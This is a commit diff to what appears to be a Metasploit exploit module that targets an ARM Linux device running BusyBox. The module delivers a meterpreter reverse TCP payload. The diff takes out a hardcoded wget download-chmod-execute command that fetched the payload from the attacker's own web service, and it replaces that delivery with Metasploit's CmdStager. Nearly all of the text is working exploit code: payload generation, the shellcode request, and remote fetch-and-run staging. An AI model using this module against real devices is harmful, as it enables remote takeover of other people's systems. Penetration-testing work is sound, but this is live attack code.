Use CmdStager instead of hardcoded wget command.
Quentin Kaiser
parent
ef2c4310a4
commit
5562af39d3
|
|
@ -17,9 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -47,6 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Platform' => %w[linux],
|
||||
'Arch' => [ARCH_ARMLE],
|
||||
'SessionTypes' => %w[meterpreter],
|
||||
'CmdStagerFlavor'=> %w{ wget },
|
||||
'Privileged' => true, # BusyBox
|
||||
'References' =>
|
||||
[
|
||||
|
|
@ -59,6 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'WfsDelay' => 10,
|
||||
'SSL' => true,
|
||||
'RPORT' => 443,
|
||||
'CMDSTAGER::FLAVOR' => 'wget',
|
||||
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
|
||||
},
|
||||
'Targets' =>
|
||||
|
|
@ -103,18 +103,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
shellcode
|
||||
end
|
||||
|
||||
# Handle incoming requests from the server
|
||||
def on_request_uri(cli, request)
|
||||
#print_status("on_request_uri called: #{request.inspect}")
|
||||
if (not @pl)
|
||||
print_error("#{peer} - A request came in, but the payload wasn't ready yet!")
|
||||
return
|
||||
end
|
||||
print_status("#{peer} - Sending the payload to the device...")
|
||||
@elf_sent = true
|
||||
send_response(cli, @pl)
|
||||
end
|
||||
|
||||
def send_request (payload)
|
||||
begin
|
||||
send_request_cgi({
|
||||
|
|
@ -138,40 +126,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Attempting to exploit #{target.name}")
|
||||
downfile = rand_text_alpha(8+rand(8))
|
||||
@pl = generate_payload_exe
|
||||
@elf_sent = false
|
||||
resource_uri = '/' + downfile
|
||||
print_status('Sending request')
|
||||
execute_cmdstager
|
||||
end
|
||||
|
||||
#do not use SSL
|
||||
if datastore['SSL']
|
||||
ssl_restore = true
|
||||
datastore['SSL'] = false
|
||||
end
|
||||
|
||||
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
|
||||
srv_host = Rex::Socket.source_address(rhost)
|
||||
else
|
||||
srv_host = datastore['SRVHOST']
|
||||
end
|
||||
|
||||
service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
|
||||
print_status("#{peer} - Starting up our web service on #{service_url} ...")
|
||||
start_service({'Uri' => {
|
||||
'Proc' => Proc.new { |cli, req|
|
||||
on_request_uri(cli, req)
|
||||
},
|
||||
'Path' => resource_uri
|
||||
}})
|
||||
|
||||
datastore['SSL'] = true if ssl_restore
|
||||
print_status("#{peer} - Asking the device to download and execute #{service_url}")
|
||||
|
||||
filename = rand_text_alpha_lower(rand(8) + 2)
|
||||
cmd = "wget #{service_url} -O /tmp/#{filename}; chmod +x /tmp/#{filename}; /tmp/#{filename} &"
|
||||
|
||||
shellcode = prepare_shellcode(cmd)
|
||||
def execute_command(cmd, opts = {})
|
||||
shellcode = prepare_shellcode(cmd.to_s)
|
||||
send_request(shellcode)
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue